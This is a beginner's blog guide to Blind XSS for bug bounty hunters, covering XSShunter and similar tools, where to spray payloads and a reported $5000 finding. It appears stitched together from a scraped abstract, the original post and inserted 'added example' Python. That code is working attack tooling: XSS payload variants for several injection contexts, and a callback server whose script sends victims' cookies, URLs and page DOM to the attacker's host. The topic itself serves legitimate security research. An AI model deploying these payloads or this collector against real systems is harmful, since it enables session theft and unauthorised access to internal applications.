The article provides a beginner's guide to Blind XSS, detailing tools, techniques, and practical examples for bug bounty hunters.
Abstract
The web content is a comprehensive guide aimed at novice bug bounty hunters interested in Blind XSS. It addresses common questions about Blind XSS, tools like XSShunter, ezXSS, bXSS, KNOXSS, and Burp Collaborator, and how to register for and use these tools effectively. The author shares personal experiences with Blind XSS, including a detailed account of a high-paying bug bounty discovery and provides tips from top bug bounty hunters on where to spray payloads. Additionally, the article offers a method to verify the functionality of XSShunter and invites readers to reach out for further questions.
Opinions
The author believes that XSShunter is a valuable tool for finding Blind XSS, emphasizing its ease of use and free access.
The article suggests that patience and persistence are key in bug bounty hunting, as demonstrated by the author's own experience with a private bounty site.
Top bug bounty hunters' advice is highly regarded, with the author recommending their strategies for payload spraying.
The author expresses a preference for using the web version of XSShunter over setting it up on a server due to a lack of patience for such a setup.
The article implies that Blind XSS can be a lucrative area of bug bounty hunting, as evidenced by the author's $5000 payout for a single report.
The author provides a simple test method to ensure XSShunter is functioning correctly, showing a commitment to practical and actionable advice.
The use of humor and a casual tone indicates that the author aims to make the topic approachable for beginners, while also respecting the expertise of more experienced readers.
Blind XSS for beginners
I get a lot of DMs on Twitter asking questions about Blind XSS: which tool to use, how to register for XSShunter, where to spray the payload, and so on. So I am writing this blog in the hope of answering some of those questions.
Note: This article is for people who are just starting with bug bounty hunting. Leets can leave this blog right here :)
What is Blind XSS?
It is a type of stored XSS where the attacker's input is saved by the server and later rendered in a completely different application (an admin dashboard, a CRM, a log viewer, a ticketing tool) used by a system admin or team member. You never get to see that page yourself, so the only way to know the payload fired is an out-of-band callback to a server you control; providing that callback host and collecting the hits is exactly what the tools below do.
Tools you can use for Blind XSS:
Currently I use the web version of XSShunter for finding Blind XSS. A few other tools you can use are ezXSS, bXSS, Burp Collaborator and KNOXSS.
How to register for XSShunter? Is it free? Do we need a domain in our name to use XSShunter?
I use the web version of XSShunter as I don't have the patience to set the tool up on my server :) It is free of cost and you can set it up by visiting the XSShunter website. Enter all the mandatory fields; in the Custom Subdomain text box you can enter any 2–3 characters (you are not supposed to enter your website URL here :)). That subdomain becomes the host your payloads call back to, so it only needs to be unique, not meaningful. With that you should be set to use the tool. One caveat for readers coming to this later: the original hosted xsshunter.com service has since been shut down, so today you will need a self-hosted instance or another hosted fork; the workflow is the same.
You can set up XSShunter on your own server by following these instructions
I also use the KNOXSS Firefox plugin sometimes. If KNOXSS finds a Blind XSS in a website, it will mail you the vulnerability details.
So where do you get the payloads from and where do you spray the payloads?
Within XSShunter there is a Payloads tab. You can get all the payloads from there, and it is better to keep a local copy of all of them so that you can spray them whenever you need to. The variants are not redundant: each one is written for a different injection context (plain HTML body, inside a quoted attribute, inside a JavaScript string, and so on), which is why you spray several rather than just one.
Now moving to the question of where to spray these payloads, which has been discussed on Twitter/Slack many times. Here are a few tips from top BB hunters.
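Since the payload list itself did not survive in this copy of the post, here is an added example (my own code, not from the original post and not XSShunter's) of the idea behind those payloads: one callback host, several variants for different injection contexts, and a per-location label in the script URL so that when a report arrives you know which field it came from. The host `bxss.example` and the field names are placeholders.

```python
from urllib.parse import quote, unquote


def make_probes(callback_host, location):
    """Blind-XSS probes for one injection point.

    callback_host: your own callback listener, e.g. "bxss.example" (placeholder)
    location:      label for the field being sprayed; it is embedded in the
                   script URL so that a firing probe identifies its source
    """
    label = quote(location, safe="")
    # Protocol-relative so the probe loads on both http and https pages
    # without being blocked as mixed content.
    src = "//{}/{}.js".format(callback_host, label)
    loader = ("var s=document.createElement('script');"
              "s.src='{}';document.documentElement.appendChild(s);".format(src))
    return {
        # Value lands in the HTML body (ticket description, comment, chat text).
        "html": '<script src="{}"></script>'.format(src),
        # Value lands in a double- or single-quoted attribute: close the
        # attribute and the tag, then open a script tag.
        "attr_dq": '"><script src="{}"></script>'.format(src),
        "attr_sq": "'><script src=\"{}\"></script>".format(src),
        # <script> gets stripped but an event handler survives.
        "img": '<img src=x onerror="{}">'.format(loader),
        # Value lands inside a single-quoted JavaScript string literal:
        # close the string, run the loader, comment out the rest of the line.
        "js_sq": "';{}//".format(loader),
    }


def location_from_path(path):
    """Recover the label from a callback request path such as "/contact-form.js"."""
    name = path.rsplit("/", 1)[-1]
    if name.endswith(".js"):
        name = name[:-3]
    return unquote(name)
```

Spray a different `location` label per form field (and per program), and keep the dictionary of what you sprayed where; the label in the incoming request path then tells you which field was stored and rendered unsafely, which is the first thing the triage team will ask.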
Any interesting BXSS which I have found?
In a private bounty site, there was an option to create reports. I created a new report with the report name set to a blind XSS payload. Luckily for me, the company had a daily batch job which would sync the data across all their QA/Stage and pentest environments. The next day my XSShunter portal was full of reports with the payload firing in 6–7 different internal environments owned by the customer. The company paid $5000 for BXSS in 6 different endpoints.
Submitted a Blind XSS payload in a "contact me" form in a PBB program and it fired in their backend Salesforce application.
Submitted a Blind XSS payload in a chat request and it fired in the Marketo application which the company was using to collect chat data.
Many of you had questions about how to check whether XSShunter is working. Simple!
Take all the payloads from the XSShunter site, save them into an HTML file and open that HTML file in your browser. After the file has opened, go to XSShunter and check whether you see any new entries. If there are entries, XSShunter is working fine. Expect fewer entries than payloads: only the variants meant for an HTML context will execute from a plain file, the attribute and JavaScript-string variants just render as text there, and a page opened from disk has no origin or cookies, so the reports will be sparser than a real hit.
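The check above tells you the hosted service is reachable, but not what it is doing for you. As an added example (my own code, not XSShunter's or the author's), the listener below is a minimal self-hosted version of the same mechanism: it serves a small callback script per probe label and records whatever the page it fired in posts back. `selftest_page` builds the HTML file from the check above, and `local_selfcheck` runs the exchange end to end on localhost with a constructed report standing in for the browser. Hostnames, labels and the `admin.example` URL are placeholders.

```python
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse

# Served for GET /<label>.js. It runs inside the victim application's origin
# when the stored payload fires and posts what it can see back to us.
# text/plain keeps the POST a CORS "simple request", so no preflight is needed.
CALLBACK_JS = """(function () {
  var report = {
    probe: %(label)s,
    url: location.href,
    referrer: document.referrer,
    cookie: document.cookie,
    dom: document.documentElement.outerHTML.slice(0, 4096)
  };
  var x = new XMLHttpRequest();
  x.open("POST", "//%(host)s/report");
  x.setRequestHeader("Content-Type", "text/plain");
  x.send(JSON.stringify(report));
})();
"""


class CollectorServer(HTTPServer):
    """HTTPServer that keeps the received reports in memory."""
    def __init__(self, address):
        super().__init__(address, _Handler)
        self.reports = []


class _Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        path = urlparse(self.path).path
        if not path.endswith(".js"):
            return self._reply(404, b"")
        label = unquote(path.rsplit("/", 1)[-1][:-3])
        # The Host header is the name the browser used to reach us, so the
        # callback script posts its report to the same place.
        body = CALLBACK_JS % {"label": json.dumps(label),
                              "host": self.headers.get("Host", "")}
        self._reply(200, body.encode(), "application/javascript")

    def do_POST(self):
        if urlparse(self.path).path != "/report":
            return self._reply(404, b"")
        raw = self.rfile.read(int(self.headers.get("Content-Length") or 0))
        try:
            report = json.loads(raw)
        except ValueError:
            report = None
        if not isinstance(report, dict):      # keep malformed hits as well
            report = {"raw": raw.decode("utf-8", "replace")}
        report["remote_ip"] = self.client_address[0]
        report["user_agent"] = self.headers.get("User-Agent", "")
        self.server.reports.append(report)
        self._reply(204, b"")

    def _reply(self, code, body, ctype="text/plain"):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_collector(host="127.0.0.1", port=0):
    """Run the listener in a background thread; port 0 picks a free port."""
    server = CollectorServer((host, port))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def selftest_page(callback_host, labels):
    """The check from the post: one HTML file that loads every probe.
    Open it in a browser; the listener should record one hit per label."""
    tags = "".join('<script src="//{}/{}.js"></script>\n'.format(callback_host, l)
                   for l in labels)
    return "<!doctype html>\n<title>bxss self-test</title>\n" + tags


def local_selfcheck():
    """End-to-end run on localhost. The browser side is replaced by a
    constructed report, so this proves the listener, not a real page."""
    server = start_collector()
    base = "http://127.0.0.1:%d" % server.server_port
    try:
        script = urllib.request.urlopen(base + "/contact-form.js").read().decode()
        fake = json.dumps({"probe": "contact-form",               # constructed hit
                           "url": "https://admin.example/tickets/42"}).encode()
        req = urllib.request.Request(base + "/report", data=fake, method="POST",
                                     headers={"Content-Type": "text/plain"})
        status = urllib.request.urlopen(req).status
    finally:
        server.shutdown()
        server.server_close()
    return script, status, list(server.reports)


if __name__ == "__main__":
    with open("bxss-selftest.html", "w") as f:
        f.write(selftest_page("127.0.0.1:8080", ["contact-form", "ticket-title"]))
    srv = start_collector(port=8080)
    print("listening on :8080; open bxss-selftest.html and inspect srv.reports")
    threading.Event().wait()
```

For a real engagement this has to sit on a public host with a DNS name and TLS, because the admin application that renders your payload is usually served over HTTPS and will refuse an `http://` script. The `cookie` field will only contain cookies without `HttpOnly`; the `url` and `dom` fields are what prove which internal application the payload fired in, which is the evidence a program will want in the report.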
For any questions, you can get in touch with me at Syntaxerror